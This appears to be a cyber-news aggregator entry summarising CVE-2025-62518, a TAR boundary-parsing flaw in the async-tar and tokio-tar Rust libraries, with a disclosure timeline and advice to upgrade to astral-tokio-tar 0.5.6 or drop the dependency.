Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Async-tar/tokio-tar boundary parsing flaw (CVE-2025-62518)

Vulnerability
First reported
Last updated
Happening score
H score 13
2 unique sources, 2 articles

Summary

Hide ▲

A high-severity TAR parsing flaw in async-tar and tokio-tar now puts archive extraction workflows at risk of remote code execution and file overwriting. The issue, tracked as CVE-2025-62518 and nicknamed TARmageddon, exploits inconsistent PAX/ustar boundary handling to smuggle hidden archive entries. Users of tokio-tar are advised to migrate to astral-tokio-tar 0.5.6 to remediate the bug.

Related Happenings

Tokio-tar remediation guidance (CVE-2025-62518)

Advisory/Mitigation
First: 22.10.2025 20:21 Last: 22.10.2025 20:21 Sources 1

How related: Edera advises developers to either upgrade to a patched version or immediately remove the vulnerable tokio-tar dependency.

About this happening: **Edera** told developers using **tokio-tar** to **upgrade to a patched version** or **immediately remove** the dependency because **CVE-2025-62518** leaves projects exposed to ar...

Open Happening

Timeline

  1. 22.10.2025 10:05 3 articles · 7mo ago

    Researchers disclose CVE-2025-62518 in async-tar and tokio-tar

    Initial Disclosure

    A high-severity parsing flaw in the async-tar Rust library and forks including tokio-tar, tracked as CVE-2025-62518 and nicknamed TARmageddon, allows crafted TAR archives to exploit inconsistent PAX/ustar header handling, smuggle nested archive entries, overwrite files within extraction directories, and potentially reach remote code execution; users relying on tokio-tar are advised to migrate to astral-tokio-tar 0.5.6.

    Show sources
    Open in new tab